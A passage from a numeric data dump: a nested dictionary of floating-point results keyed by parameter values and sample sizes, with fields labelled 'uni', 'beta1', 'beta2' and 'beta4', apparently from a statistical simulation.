0.6435260478502861, 'beta4': [0.02156809827287651, 1.3310952312116713]}, 75: {'uni': 0.2051974936490455, 'beta1': 0.04438683443429087, 'beta2': 0.7570265710330468, 'beta4': [0.02519624884405606, 1.3151982531497861]}, 50: {'uni': 0.24755928104164165, 'beta1': 0.07941075920923452, 'beta2': 0.5523721622394626, 'beta4': [0.032146481769480144, 1.3112402606407734]}, 30: {'uni': 0.31261585515906276, 'beta1': 0.18074582175361859, 'beta2': 0.7859291996037391, 'beta4': [0.06990167942655667, 1.2489639807507744]}, 20: {'uni': 0.47757757711804133, 'beta1': 0.3892655220378294, 'beta2': 0.65429188208398, 'beta4': [0.07124185190053445, 1.20898602562413]}, 10: {'uni': 0.758938135412502, 'beta1': 0.6071917038027647, 'beta2': 0.8133960727391841, 'beta4': [0.1418543707432124, 1.172110809011133]}}, 50: {1000: {'uni': 0.2519872356069227, 'beta1': 0.09956789513840078, 'beta2': 0.5973602366915676, 'beta4': [0.03557118792760849, 1.846420958350958]}, 750: {'uni': 0.22274951858723938, 'beta1': 0.14482781845510667, 'beta2': 0.6178955775749804, 'beta4': [0.03823593411101681, 1.6198382539682874]}, 500: {'uni': 0.28071600405504815, 'beta1': 0.09158498231032232, 'beta2': 0.7997535279942787, 'beta4': [0.04163171710115897, 1.650963554921299]}, 400: {'uni': 0.2922089526616882, 'beta1': 0.11759396626445189, 'beta2': 0.7731995739049791, 'beta4': [0.037647902544816, 1.7656229411142739]}, 300: {'uni': 0.25418399430527083, 'beta1': 0.13751569298349953, 'beta2': 0.7573774424984173, 'beta4': [0.05931918746259869, 1.7791282172821952]}, 200: {'uni': 0.23531715081630106, 'beta1': 0.11068962000304736, 'beta2': 0.6622845585879117, 'beta4': [0.03585546142253086, 1.6847743436735174]}, 150: {'uni': 0.2571656578305455, 'beta1': 0.0990487380070637, 'beta2': 0.9408378093466124, 'beta4': [0.04508196722079799, 1.6238817123606337]}, 100: {'uni': 0.30195245498224216, 'beta1': 0.12530632794125562, 'beta2': 0.791776346980489, 'beta4': [0.03925044382813762, 1.4734408851271226]}, 75: {'uni': 0.22035812392432402, 'beta1': 
0.07800979369300794, 'beta2': 0.842860198671106, 'beta4': [0.03637344064264452, 1.549853109016985]}, 50: {'uni': 0.22701572090938457, 'beta1': 0.09633906028439704, 'beta2': 0.7417429467761041, 'beta4': [0.03967152130862653, 1.4208398087842706]}, 30: {'uni': 0.34305046792602056, 'beta1': 0.19457807203493765, 'beta2': 0.7688470256335644, 'beta4': [0.054957912588768955, 1.360607831613779]}, 20: {'uni': 0.44028196804498093, 'beta1': 0.3293466137962002, 'beta2': 0.8955070612796764, 'beta4': [0.08742726496427163, 1.3095948825783168]}, 10: {'uni': 0.7699134066893929, 'beta1': 0.6638012059398908, 'beta2': 0.8293763559338202, 'beta4': [0.16302206868052743, 1.255835042638528]}}, 30: {1000: {'uni': 0.3783603182203987, 'beta1': 0.2985135916574845, 'beta2': 0.8480133889666746, 'beta4': [0.07400878504174886, 1.8720458507484417]}, 750: {'uni': 0.4154933226222209, 'beta1': 0.24934139997421964, 'beta2': 1.160778307881534, 'beta4': [0.07685054947159019, 2.044210757725545]}, 500: {'uni': 0.550909588495024, 'beta1': 0.2313146347432924, 'beta2': 0.936385734064073, 'beta4': [0.07048754696750378, 1.9792386217682503]}, 400: {'uni': 0.5076547857886943, 'beta1': 0.32364070076843526, 'beta2': 0.828794665169518, 'beta4': [0.05552868809465391, 2.13369982878608]}, 300: {'uni': 0.4212091415576435, 'beta1': 0.6407736056430736, 'beta2': 1.0918478367941438, 'beta4': [0.06705773137193753, 2.183556190312245]}, 200: {'uni': 0.5222535142935859, 'beta1': 0.25665396488998615, 'beta2': 0.9107840939614209, 'beta4': [0.06654571092334242, 1.805631337994444]}, 150: {'uni': 0.43316941974778084, 'beta1': 0.20792026635549665, 'beta2': 0.9315624660996159, 'beta4': [0.08392298669805384, 1.8279786709160393]}, 100: {'uni': 0.4390903940116475, 'beta1': 0.23112811858430285, 'beta2': 1.1529115982571578, 'beta4': [0.06978068315817124, 1.991075733195905]}, 75: {'uni': 0.4108132941809196, 'beta1': 0.3623491730750028, 'beta2': 0.987753882594803, 'beta4': [0.06674754238444675, 1.840030509070244]}, 50: {'uni': 
0.43236438562108004, 'beta1': 0.26646388556150524, 'beta2': 1.1050012918364582, 'beta4': [0.07546899560971876, 1.7970124808313264]}, 30: {'uni': 0.48845354994614554, 'beta1': 0.2512856894263626, 'beta2': 1.0020051752860113, 'beta4': [0.05853483814283524, 1.6209383322431605]}, 20: {'uni': 0.46205240371135886, 'beta1': 0.33039091692066247, 'beta2': 0.8763727543362038, 'beta4': [0.08506956671611077, 1.6253602089503376]}, 10: {'uni': 0.7376491727942917, 'beta1': 0.701426624157432, 'beta2': 1.0318845897107891, 'beta4': [0.16199617337961164, 1.4429581649223886]}}, 20: {1000: {'uni': 0.8019976350067, 'beta1': 0.8332259715318519, 'beta2': 1.1366607302655636, 'beta4': [0.08995158287931063, 2.523474384380298]}, 750: {'uni': 0.8240765825127023, 'beta1': 0.6078699965037111, 'beta2': 1.3066093350540289, 'beta4': [0.09399747363931381, 2.5986801791624394]}, 500: {'uni': 0.9974083513430438, 'beta1': 0.5023448507895341, 'beta2': 1.5764142648731303, 'beta4': [0.08892101043100277, 2.4498259406795078]}, 400: {'uni': 0.65987087499712, 'beta1': 1.0021947304857353, 'beta2': 1.0133412632320413, 'beta4': [0.09297169783242988, 2.203514161015423]}, 300: {'uni': 0.8346407450005573, 'beta1': 0.4858229844832691, 'beta2': 1.7026411990816142, 'beta4': [0.09176193095098974, 2.4706819211929543]}, 200: {'uni': 0.6097035714025173, 'beta1': 0.5346254040464333, 'beta2': 1.316817789777299, 'beta4': [0.09682457806892368, 2.242178483680891]}, 150: {'uni': 0.7118891887622544, 'beta1': 0.73757966982389, 'beta2': 1.756042304492378, 'beta4': [0.09424018725867234, 2.456661404213161]}, 100: {'uni': 0.7037802965100136, 'beta1': 1.3606834631757059, 'beta2': 1.3043054700351289, 'beta4': [0.10217585159933665, 2.3827792567388353]}, 75: {'uni': 0.8055662843703303, 'beta1': 0.46287340020535195, 'beta2': 1.2503612065373881, 'beta4': [0.10490481871712838, 2.816915331499867]}, 50: {'uni': 0.8246742261483321, 'beta1': 0.6187824029797957, 'beta2': 1.3150729181082033, 'beta4': [0.08275958000501926, 2.42227261187819]}, 30: 
{'uni': 0.6868898977184308, 'beta1': 0.40962747269539135, 'beta2': 1.3439023117013336, 'beta4': [0.10164499360892393, 1.9097766052880618]}, 20: {'uni': 0.554678594337485, 'beta1': 0.5266918425509246, 'beta2': 1.3548613513588386, 'beta4': [0.10398481149694526, 1.9876903951414775]}, 10: {'uni': 1.0446131131368517, 'beta1': 0.7747696875546464, 'beta2': 1.8108754189944798, 'beta4': [0.15817077417264236, 1.7127206843317608]}}, 10: {1000: {'uni': 1.6849860990985794, 'beta1': 2.7439137403319105, 'beta2': 2.734111069331994, 'beta4': [0.18923271560035437, 5.02925901860904]}, 750: {'uni': 1.830761737169992, 'beta1': 2.5751354681579217, 'beta2': 2.663574129357734, 'beta4': [0.16303669261193782, 3.6181870370037714]}, 500: {'uni': 3.2685644351081553, 'beta1': 2.497162317342663, 'beta2': 3.831873093092898, 'beta4': [0.19152027457838408, 5.277460841781809]}, 400: {'uni': 1.8175906273340954, 'beta1': 5.798628259006607, 'beta2': 2.265996141562548, 'beta4': [0.18666272909519135, 4.311034510201182]}, 300: {'uni': 1.752330482850812, 'beta1': 2.446640937487978, 'beta2': 3.156170480487465, 'beta4': [0.19335453547615575, 4.062291176554196]}, 200: {'uni': 2.585300579248603, 'beta1': 3.8614772252430134, 'beta2': 2.427817506054191, 'beta4': [0.199460824777887, 4.721530100708777]}, 150: {'uni': 1.8997609248765257, 'beta1': 2.003172066142217, 'beta2': 2.9051765798592735, 'beta4': [0.18230429899009304, 3.829273701760521]}, 100: {'uni': 2.225330605252653, 'beta1': 3.1330535103231005, 'beta2': 3.866579491183401, 'beta4': [0.1914076126447997, 5.931444497716789]}, 75: {'uni': 1.9375681374299873, 'beta1': 3.2234217980405666, 'beta2': 2.8971241927601485, 'beta4': [0.1910362420977265, 4.146413907380423]}, 50: {'uni': 2.1226998033229885, 'beta1': 2.5656176115610667, 'beta2': 2.663512620988418, 'beta4': [0.16892315886491896, 4.140040221647824]}, 30: {'uni': 2.7067057347613, 'beta1': 2.114623008671077, 'beta2': 3.0476671138328455, 'beta4': [0.1765011431579746, 3.5581193469388115]}, 20: {'uni': 
1.6776878433144786, 'beta1': 2.649907170376919, 'beta2': 3.214279820200537, 'beta4': [0.14485132858460728, 3.385563064254459]}, 10: {'uni': 1.7640526663634954, 'beta1': 2.6540089660589876, 'beta2': 4.178786013879768, 'beta4': [0.20634373982749682, 2.921191233260417]}}}, 0.01: {1000: {1000: {'uni': 0.012988144078803505, 'beta1': 0.00038944275185018686, 'beta2': 0.2739412257196214, 'beta4': [0.001901429926485662, 1.0744670600689628]}, 750: {'uni': 0.018954493311881516, 'beta1': 0.0004064874368649216, 'beta2': 0.28164334341957836, 'beta4': [0.0027292845187166957, 1.0598748530262019]}, 500: {'uni': 0.03227328882297064, 'beta1': 0.0012917244174020107, 'beta2': 0.27037257115863184, 'beta4': [0.0038621658913706495, 1.0547470718911076]}, 400: {'uni': 0.03433464054395813, 'beta1': 0.002369780517218288, 'beta2': 0.28063958889740204, 'beta4': [0.004902554260141074, 1.049709686035498]}, 300: {'uni': 0.03831461561224829, 'beta1': 0.0037592167513096075, 'beta2': 0.29835323043874173, 'beta4': [0.007071102509495777, 1.0426217515350968]}, 200: {'uni': 0.05674481720406174, 'beta1': 0.005284832803397361, 'beta2': 0.3427814820719719, 'beta4': [0.009425129653536651, 1.0391934783953622]}, 150: {'uni': 0.08834898466342368, 'beta1': 0.01244014911343485, 'beta2': 0.3905746763051995, 'beta4': [0.012342493157189289, 1.0348233308668668]}, 100: {'uni': 0.11894024946831482, 'beta1': 0.02444975073959859, 'beta2': 0.44907614468337353, 'beta4': [0.019659596279589155, 1.028889046296725]}, 75: {'uni': 0.1527862700499143, 'beta1': 0.04787451628654083, 'beta2': 0.4787033135597648, 'beta4': [0.029747587227536555, 1.0245077390872745]}, 50: {'uni': 0.2426038704397449, 'beta1': 0.0782378615031597, 'beta2': 0.5218056644958682, 'beta4': [0.041527131802373184, 1.0224094385417244]}, 30: {'uni': 0.3390533680971421, 'beta1': 0.18939106161176048, 'beta2': 0.6846835998957418, 'beta4': [0.056675214880820765, 1.0166970485545934]}, 20: {'uni': 0.45235784655368927, 'beta1': 0.3714038453778036, 'beta2': 
0.7011438160594685, 'beta4': [0.08848504553932762, 1.014212197651508]}, 10: {'uni': 0.7798616064607444, 'beta1': 0.6626215824023616, 'beta2': 0.854942257338083, 'beta4': [0.1361740799714233, 1.0112064148732012]}}, 750: {1000: {'uni': 0.014111659450113783, 'beta1': 0.0005193837132983345, 'beta2': 0.3041417560035209, 'beta4': [0.0021059808213720623, 1.089260808726159]}, 750: {'uni': 0.01776621568011013, 'beta1': 0.0005404605453736952, 'beta2': 0.30632535812118766, 'beta4': [0.002608330400828606, 1.075273109299807]}, 500: {'uni': 0.028705411835050567, 'beta1': 0.0009701162458206792, 'beta2': 0.293387533478566, 'beta4': [0.0035869489765737637, 1.0736332892832816]}, 400: {'uni': 0.035925270100480564, 'beta1': 0.002115883346584126, 'beta2': 0.28846361046306584, 'beta4': [0.0053041492994923365, 1.0685684661263208]}, 300: {'uni': 0.04739663294754829, 'beta1': 0.003944792065230057, 'beta2': 0.3262201641618077, 'beta4': [0.005481018761212053, 1.06674288435139]}, 200: {'uni': 0.07323025971109642, 'beta1': 0.007079292499444228, 'beta2': 0.3504479078456703, 'beta4': [0.008241651578483802, 1.0545837824070112]}, 150: {'uni': 0.07891186837596025, 'beta1': 0.019368677322849078, 'beta2': 0.3677325048079892, 'beta4': [0.01125347103088656, 1.0474333377718406]}, 100: {'uni': 0.11954949574624353, 'beta1': 0.02051741147566948, 'beta2': 0.4607118280456165, 'beta4': [0.018024830416066322, 1.038629659877778]}, 75: {'uni': 0.1667857566555556, 'beta1': 0.03694914894551043, 'beta2': 0.4922451884656646, 'beta4': [0.023016121704478844, 1.0328691452557426]}, 50: {'uni': 0.267023428032651, 'beta1': 0.07890588955448231, 'beta2': 0.5378520535647412, 'beta4': [0.03789863377657755, 1.0276001043725385]}, 30: {'uni': 0.33785390816595817, 'beta1': 0.24746683430732205, 'beta2': 0.6249081272448354, 'beta4': [0.06161697678822258, 1.021437251450835]}, 20: {'uni': 0.48292750740180024, 'beta1': 0.2717511395739313, 'beta2': 0.6945127698879909, 'beta4': [0.08268620779342578, 1.0216636840969495]}, 10: {'uni': 
0.7248197547615234, 'beta1': 0.6245977329525259, 'beta2': 0.8875678105634364, 'beta4': [0.1421881432843648, 1.0143655081623668]}}, 500: {1000: {'uni': 0.02188975323112398, 'beta1': 0.0017453824253913159, 'beta2': 0.2956035109830917, 'beta4': [0.003767105090318207, 1.1268252528300466]}, 750: {'uni': 0.02357228780744032, 'beta1': 0.0010166197623719666, 'beta2': 0.29909761062079904, 'beta4': [0.004875872603854908, 1.1245773629752243]}, 500: {'uni': 0.026837036395264052, 'beta1': 0.0013010746719904127, 'beta2': 0.3014218767173777, 'beta4': [0.003665030466863662, 1.1012534822690934]}, 400: {'uni': 0.028163152714100657, 'beta1': 0.001967008933802825, 'beta2': 0.2916764354442436, 'beta4': [0.006081151372860138, 1.0973592614277135]}, 300: {'uni': 0.04039589266243756, 'beta1': 0.0025297031214923577, 'beta2': 0.3291987120650441, 'beta4': [0.006762903272845259, 1.0927311729646423]}, 200: {'uni': 0.06381560712414723, 'beta1': 0.008711588337987476, 'beta2': 0.349388068575829, 'beta4': [0.009518281554600943, 1.0705205650736693]}, 150: {'uni': 0.08822872644657972, 'beta1': 0.012625655119434065, 'beta2': 0.36359164688986806, 'beta4': [0.0122975587808102, 1.066828776680399]}, 100: {'uni': 0.12034086569249816, 'beta1': 0.028199486576761034, 'beta2': 0.4013937953505733, 'beta4': [0.019410294600082315, 1.0546743195542243]}, 75: {'uni': 0.15710173020411988, 'beta1': 0.05948850797839798, 'beta2': 0.4602254974955219, 'beta4': [0.025921724099794863, 1.0517010799471413]}, 50: {'uni': 0.2532312265823954, 'beta1': 0.07607149041242904, 'beta2': 0.5570252079040533, 'beta4': [0.033107476011882166, 1.0439643502035127]}, 30: {'uni': 0.3533095624701312, 'beta1': 0.17481473091875682, 'beta2': 0.6082250929487117, 'beta4': [0.06369605726718264, 1.0356758375491901]}, 20: {'uni': 0.4570589338099327, 'beta1': 0.3041261325532901, 'beta2': 0.7013060580251537, 'beta4': [0.09388192904197612, 1.02753591382958]}, 10: {'uni': 0.7060683718900814, 'beta1': 0.6155479784933189, 'beta2': 0.8355785086184536, 
'beta4': [0.13642816215229916, 1.0217206967991093]}}, 400: {1000: {'uni': 0.028838920421234225, 'beta1': 0.002023990721398416, 'beta2': 0.3595884886124153, 'beta4': [0.004349264377807316, 1.1499553996186684]}, 750: {'uni': 0.031760309280321905, 'beta1': 0.0017463269958980757, 'beta2': 0.347593944893794, 'beta4': [0.004966482944978197, 1.1387788815091806]}, 500: {'uni': 0.029639682537053992, 'beta1': 0.0021690481189058836, 'beta2': 0.36575693930787684, 'beta4': [0.004787347135222721, 1.143960636467822]}, 400: {'uni': 0.03448428077909005, 'beta1': 0.001679178738135301, 'beta2': 0.3332601516725951, 'beta4': [0.005365773889334185, 1.1224023010554964]}, 300: {'uni': 0.03728507705357348, 'beta1': 0.003421016079149095, 'beta2': 0.35258759568773423, 'beta4': [0.006769452240699886, 1.0992128217714925]}, 200: {'uni': 0.05937386031855901, 'beta1': 0.008088451915504932, 'beta2': 0.34891296908227415, 'beta4': [0.009966202932037182, 1.0926275641542096]}, 150: {'uni': 0.07494825539591718, 'beta1': 0.009900336507182075, 'beta2': 0.3633810337591094, 'beta4': [0.014015410676247208, 1.0756766254279038]}, 100: {'uni': 0.1452740820402087, 'beta1': 0.04566624562697337, 'beta2': 0.4244085797936966, 'beta4': [0.017619373414129016, 1.0838082958740982]}, 75: {'uni': 0.15759696343829202, 'beta1': 0.03295314139475574, 'beta2': 0.49107280365146033, 'beta4': [0.026961926104242254, 1.0616881249470593]}, 50: {'uni': 0.19965377944271542, 'beta1': 0.09170708993967416, 'beta2': 0.5174241834899962, 'beta4': [0.034885863449721756, 1.0533340818568644]}, 30: {'uni': 0.3911037951130236, 'beta1': 0.2008621720408328, 'beta2': 0.5813834794397994, 'beta4': [0.06621448432105294, 1.0418362843449036]}, 20: {'uni': 0.4532644917880779, 'beta1': 0.31046491235637047, 'beta2': 0.6983812924974165, 'beta4': [0.08584145551321705, 1.0397579843043205]}, 10: {'uni': 0.7049112936255675, 'beta1': 0.5619870648762287, 'beta2': 0.8624110416345726, 'beta4': [0.1420336605742772, 1.0260483032144943]}}, 300: {1000: {'uni': 
0.0477506434275743, 'beta1': 0.002656018923794836, 'beta2': 0.38169507431662775, 'beta4': [0.006751240462940516, 1.2044384118076963]}, 750: {'uni': 0.035866440402403874, 'beta1': 0.0025682164531108864, 'beta2': 0.34754934812720045, 'beta4': [0.0060399489557519375, 1.1780336640262834]}, 500: {'uni': 0.0429976433778337, 'beta1': 0.0026997677700779025, 'beta2': 0.3497225195634406, 'beta4': [0.007766880718984553, 1.1714570291435575]}, 400: {'uni': 0.03796627964983832, 'beta1': 0.002680918831818506, 'beta2': 0.31845072684018694, 'beta4': [0.007637211923669038, 1.1767951740193134]}, 300: {'uni': 0.047954341706110834, 'beta1': 0.0040228007949967785, 'beta2': 0.3915189178090604, 'beta4': [0.008341049725251948, 1.1413934344116414]}, 200: {'uni': 0.058801039052903466, 'beta1': 0.008131127056643357, 'beta2': 0.3604135850986866, 'beta4': [0.009896706931841125, 1.1266276510964888]}, 150: {'uni': 0.07601882623660774, 'beta1': 0.009681047272849304, 'beta2': 0.3807318897695535, 'beta4': [0.013563834359170562, 1.1052335637146984]}, 100: {'uni': 0.10841635391980659, 'beta1': 0.02419096018981847, 'beta2': 0.42051425698862294, 'beta4': [0.02332073317446744, 1.1007862236489643]}, 75: {'uni': 0.15644575063485539, 'beta1': 0.04333966354385248, 'beta2': 0.4510221433433015, 'beta4': [0.025484265648400898, 1.0826793645564343]}, 50: {'uni': 0.22229790326206228, 'beta1': 0.1194104696114188, 'beta2': 0.4972862665901895, 'beta4': [0.033032126852486986, 1.0680192364892767]}, 30: {'uni': 0.3421584222803109, 'beta1': 0.19426053661209747, 'beta2': 0.5991003031397995, 'beta4': [0.05774687896095791, 1.0585791153399502]}, 20: {'uni': 0.41000310363205883, 'beta1': 0.2872927401171547, 'beta2': 0.6791792500576637, 'beta4': [0.08202980551373394, 1.0494588632705306]}, 10: {'uni': 0.71394883730954, 'beta1': 0.6012605316921776, 'beta2': 0.8215291167423904, 'beta4': [0.13552082196825826, 1.032384877072474]}}, 200: {1000: {'uni': 0.05637428762936589, 'beta1': 0.009217193420871453, 'beta2': 0.4051235658647831, 
'beta4': [0.009264717821869932, 1.255668494974553]}, 750: {'uni': 0.06205625295675565, 'beta1': 0.006241707563085184, 'beta2': 0.40628981422557625, 'beta4': [0.01166396870680152, 1.2401049601104341]}, 500: {'uni': 0.06620774051688502, 'beta1': 0.011631472592465388, 'beta2': 0.4086508125338102, 'beta4': [0.007982398419828483, 1.2123535892253303]}, 400: {'uni': 0.0557159019556888, 'beta1': 0.0070003045875467775, 'beta2': 0.4479874895263648, 'beta4': [0.01377141708582481, 1.217623150358333]}, 300: {'uni': 0.057193255915006416, 'beta1': 0.007083152253381874, 'beta2': 0.3989165098362032, 'beta4': [0.009459881899006482, 1.2241605731085128]}, 200: {'uni': 0.0655493345741656, 'beta1': 0.007667494082330394, 'beta2': 0.432352490564409, 'beta4': [0.011521818555387774, 1.179336090260994]}, 150: {'uni': 0.07708595959479046, 'beta1': 0.010004943140099752, 'beta2': 0.41657253266663674, 'beta4': [0.01604343437557773, 1.1583265664784832]}, 100: {'uni': 0.1263165132491358, 'beta1': 0.021544496545364552, 'beta2': 0.4433791705263855, 'beta4': [0.019640660826383667, 1.1432617638709475]}, 75: {'uni': 0.13284213618342994, 'beta1': 0.03353682532833947, 'beta2': 0.4463651381186589, 'beta4': [0.024553127311670607, 1.1144945057044657]}, 50: {'uni': 0.20031721347214956, 'beta1': 0.10486774187747581, 'beta2': 0.5246839387173443, 'beta4': [0.034818327742525974, 1.1157231794606]}, 30: {'uni': 0.31301904620451293, 'beta1': 0.1886326936481399, 'beta2': 0.6187788281549748, 'beta4': [0.061042826858162515, 1.08255899857378]}, 20: {'uni': 0.461074120032512, 'beta1': 0.32435297663532797, 'beta2': 0.6749616321255197, 'beta4': [0.0878038173182829, 1.0723825999562786]}, 10: {'uni': 0.7327323930086018, 'beta1': 0.6021409002552052, 'beta2': 0.8163811901265174, 'beta4': [0.13141861102455427, 1.0566349108690218]}}, 150: {1000: {'uni': 0.067317033122647, 'beta1': 0.014610653548333328, 'beta2': 0.41423990594181115, 'beta4': [0.015195465900901773, 1.2975972495921606]}, 750: {'uni': 0.07134739771277643, 'beta1': 
0.01297675226601242, 'beta2': 0.4449985726026145, 'beta4': [0.012702984043174723, 1.332657446897552]}, 500: {'uni': 0.07158654805341536, 'beta1': 0.013205514989078588, 'beta2': 0.47765967888624855, 'beta4': [0.012293972130509437, 1.3157095294645398]}, 400: {'uni': 0.07034182650532116, 'beta1': 0.01407065712769308, 'beta2': 0.4931374751253587, 'beta4': [0.014390288214085094, 1.2612997638466985]}, 300: {'uni': 0.0668930803759735, 'beta1': 0.01552094864787745, 'beta2': 0.4352322164574502, 'beta4': [0.016111201075420335, 1.2999205241316818]}, 200: {'uni': 0.08210671115008272, 'beta1': 0.014309982621535088, 'beta2': 0.4229267072174695, 'beta4': [0.013810958058404505, 1.2279022666381392]}, 150: {'uni': 0.0819048770127292, 'beta1': 0.014083915977824326, 'beta2': 0.4455770748001402, 'beta4': [0.016448989256336397, 1.2261023328679816]}, 100: {'uni': 0.1124619227831381, 'beta1': 0.02212891084615586, 'beta2': 0.43315186256637916, 'beta4': [0.018516927750900816, 1.1990428526671064]}, 75: {'uni': 0.17413627406404164, 'beta1': 0.04830138338528511, 'beta2': 0.4614161459404568, 'beta4': [0.024628147211136243, 1.1682951226810308]}, 50: {'uni': 0.19441361375983962, 'beta1': 0.09555994518728896, 'beta2': 0.5085726037388353, 'beta4': [0.04000423309857408, 1.133646779809821]}, 30: {'uni': 0.3596328489794518, 'beta1': 0.23345596980686195, 'beta2': 0.602035328072322, 'beta4': [0.05595016121396317, 1.1063362253083466]}, 20: {'uni': 0.49940022824485364, 'beta1': 0.2718272917375905, 'beta2': 0.6917953420150722, 'beta4': [0.0888019052729563, 1.0940863023258154]}, 10: {'uni': 0.7640204794969943, 'beta1': 0.60836577588252, 'beta2': 0.8377569007699075, 'beta4': [0.13896115419536065, 1.0695729688122164]}}, 100: {1000: {'uni': 0.11821762730536435, 'beta1': 0.047083881271799286, 'beta2': 0.4767329414414302, 'beta4': [0.019696898025009797, 1.3759780450899495]}, 750: {'uni': 0.166497002146877, 'beta1': 0.030191650365528174, 'beta2': 0.5745771850100575, 'beta4': [0.01874142585554488, 
1.4019321119063006]}, 500: {'uni': 0.1141489883572298, 'beta1': 0.022886589383535046, 'beta2': 0.5059188810811766, 'beta4': [0.023892329918408214, 1.4176836808914035]}, 400: {'uni': 0.10757279402523523, 'beta1': 0.025910744712307768, 'beta2': 0.47516791997531455, 'beta4': [0.024887362134068027, 1.3407564518745063]}, 300: {'uni': 0.11205473228712978, 'beta1': 0.027816294963348084, 'beta2': 0.4595203252789575, 'beta4': [0.02102816906813093, 1.3896095092313074]}, 200: {'uni': 0.1392639018340233, 'beta1': 0.03466261671448098, 'beta2': 0.5064836388671088, 'beta4': [0.019827730733462973, 1.320973379428104]}, 150: {'uni': 0.11172731925062222, 'beta1': 0.03045757437870108, 'beta2': 0.5429801538798318, 'beta4': [0.018311927090665446, 1.2966994614956564]}, 100: {'uni': 0.1417705961325182, 'beta1': 0.02776033911186053, 'beta2': 0.5135092406613353, 'beta4': [0.021989948671619727, 1.2844512305552225]}, 75: {'uni': 0.16977766093730104, 'beta1': 0.04538718671723866, 'beta2': 0.5048319481429052, 'beta4': [0.025361562349700335, 1.2253436336047208]}, 50: {'uni': 0.21773281447174667, 'beta1': 0.12655947351187494, 'beta2': 0.5958498671576513, 'beta4': [0.04232872037917144, 1.2340478264352763]}, 30: {'uni': 0.3857845219796272, 'beta1': 0.16290330189484536, 'beta2': 0.5970726414958795, 'beta4': [0.06907454580959214, 1.181378758222426]}, 20: {'uni': 0.5361371234035757, 'beta1': 0.3035233614902238, 'beta2': 0.6522890347608998, 'beta4': [0.0820029520321425, 1.152442746950051]}, 10: {'uni': 0.701243951130363, 'beta1': 0.5876166702780768, 'beta2': 0.8498127976808606, 'beta4': [0.13423588905558106, 1.108482890069536]}}, 75: {1000: {'uni': 0.1504497409553797, 'beta1': 0.05778886589789175, 'beta2': 0.5689795075236423, 'beta4': [0.025579604139058413, 1.502171976116502]}, 750: {'uni': 0.1656421417501711, 'beta1': 0.044118094938877105, 'beta2': 0.5308608243630025, 'beta4': [0.025236193283323678, 1.5214092977699725]}, 500: {'uni': 0.1406288013165275, 'beta1': 0.04710819524731978, 'beta2': 
0.6294260138397421, 'beta4': [0.03263872467003944, 1.466691104643992]}, 400: {'uni': 0.15260582744474926, 'beta1': 0.049746732140211046, 'beta2': 0.5786004110828491, 'beta4': [0.03002446814907474, 1.4657161105126315]}, 300: {'uni': 0.17139718657612807, 'beta1': 0.043265461012224546, 'beta2': 0.598207639599414, 'beta4': [0.02535836803938531, 1.4335637902113987]}, 200: {'uni': 0.1621007031460252, 'beta1': 0.060715336606847865, 'beta2': 0.627958646227533, 'beta4': [0.02854988898787995, 1.414080068290809]}, 150: {'uni': 0.15657389926793341, 'beta1': 0.04517196769162301, 'beta2': 0.6008731596546857, 'beta4': [0.024001517469219674, 1.4033912381741407]}, 100: {'uni': 0.20078010791468953, 'beta1': 0.0638685270180855, 'beta2': 0.6024611592669924, 'beta4': [0.026687989153733143, 1.3684372461164178]}, 75: {'uni': 0.19558911614822283, 'beta1': 0.04127156075089937, 'beta2': 0.6219872948600622, 'beta4': [0.02530115353980352, 1.3504751064168508]}, 50: {'uni': 0.24945016241095797, 'beta1': 0.09548932332721162, 'beta2': 0.5704743061455884, 'beta4': [0.03469103695069554, 1.2910941153233388]}, 30: {'uni': 0.3843775697870882, 'beta1': 0.2162354295470449, 'beta2': 0.7225395232778488, 'beta4': [0.06097975411870599, 1.26014709077903]}, 20: {'uni': 0.4608099490730844, 'beta1': 0.377609439074759, 'beta2': 0.6828014075803406, 'beta4': [0.0845414617819174, 1.2220498105221698]}, 10: {'uni': 0.6957575487038375, 'beta1': 0.5817711102357613, 'beta2': 0.8159662327945509, 'beta4': [0.1456865472262332, 1.1761074832049092]}}, 50: {1000: {'uni': 0.2171563016332781, 'beta1': 0.1119882220067852, 'beta2': 0.7295328909426251, 'beta4': [0.036596828296387295, 1.6695178637251924]}, 750: {'uni': 0.31980644420219206, 'beta1': 0.08356402070230286, 'beta2': 0.6568872602016991, 'beta4': [0.03644848778622732, 1.664721881332084]}, 500: {'uni': 0.2787119122221463, 'beta1': 0.08564305576207892, 'beta2': 0.8076205045555513, 'beta4': [0.0372663869694284, 1.5845679652678826]}, 400: {'uni': 0.31512954719118724, 'beta1': 
0.09191934849852293, 'beta2': 0.6399963438304054, 'beta4': [0.044356775686283226, 1.6887226611881236]}, 300: {'uni': 0.2978852335601706, 'beta1': 0.11065776415347438, 'beta2': 0.7109359356279316, 'beta4': [0.04377085876988734, 1.6943468662995624]}, 200: {'uni': 0.2698837516337762, 'beta1': 0.08657074634623589, 'beta2': 0.8781098176902961, 'beta4': [0.03965972203722568, 1.6965554757595365]}, 150: {'uni': 0.29282860454290066, 'beta1': 0.12956993080392998, 'beta2': 0.8337280661846921, 'beta4': [0.03678242047033739, 1.5699018695803737]}, 100: {'uni': 0.2996686665157128, 'beta1': 0.09487879758008413, 'beta2': 0.7989016053228302, 'beta4': [0.038780796201137155, 1.4885204427669143]}, 75: {'uni': 0.26825135650124593, 'beta1': 0.1304663803307884, 'beta2': 0.6382631197739325, 'beta4': [0.038703446172140665, 1.548809371611096]}, 50: {'uni': 0.23328719602827164, 'beta1': 0.1279056112762378, 'beta2': 0.7337035166527172, 'beta4': [0.04461719221729034, 1.4355747808596746]}, 30: {'uni': 0.31766342420836724, 'beta1': 0.2073845454902525, 'beta2': 0.8664281705960387, 'beta4': [0.061479928757434674, 1.4337600600297795]}, 20: {'uni': 0.49857944269872956, 'beta1': 0.37194117505787716, 'beta2': 0.7303859611553145, 'beta4': [0.07943618683979671, 1.3507146157854548]}, 10: {'uni': 0.6740063613368987, 'beta1': 0.5875002880392719, 'beta2': 0.8294800540083995, 'beta4': [0.1423435773909963, 1.2455677102577796]}}, 30: {1000: {'uni': 0.4041367657774476, 'beta1': 0.3891252626085872, 'beta2': 0.8917332171691094, 'beta4': [0.06069384516805439, 2.0878809853058136]}, 750: {'uni': 0.6063487450248459, 'beta1': 0.28515250770408407, 'beta2': 0.907323908221825, 'beta4': [0.06777651085585552, 2.165511890410776]}, 500: {'uni': 0.44887745342739666, 'beta1': 0.20142163124187815, 'beta2': 1.0586969462772107, 'beta4': [0.06112703890643645, 1.9450821248923096]}, 400: {'uni': 0.3671219293884009, 'beta1': 0.29439578709842673, 'beta2': 0.8625000041807787, 'beta4': [0.07096987575608635, 2.292088965648115]}, 300: 
